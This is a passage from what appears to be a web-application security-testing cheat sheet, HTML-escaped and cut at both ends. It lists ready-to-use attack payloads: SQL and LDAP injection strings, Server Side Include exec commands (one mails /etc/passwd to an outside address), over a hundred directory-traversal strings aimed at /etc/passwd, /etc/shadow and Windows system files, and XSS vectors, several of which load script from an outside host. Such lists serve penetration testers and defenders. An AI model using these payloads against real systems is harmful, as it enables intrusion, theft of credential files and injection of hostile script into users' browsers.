char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;lt;mailto:Foobar@email.de&amp;gt; &amp;lt; cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;apos;&lt;br /&gt;
\\&amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.''&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Statements&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;gt;&amp;quot;&amp;quot;;' &amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;lt;SCR\0IPT&amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;lt;/SCR\0IPT&amp;gt;&amp;quot;&amp;quot;;' &amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;lt;B&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;lt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;a=/XSS/\nalert(a.source)&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;lt;/SCRIPT&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;BODY ONLOAD=alert('XSS')&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;gt;&amp;lt;/LAYER&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@import'http://ha.ckers.org/xss.css';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE&amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;lt;/STYLE&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;gt;&amp;quot;&lt;br /&gt;
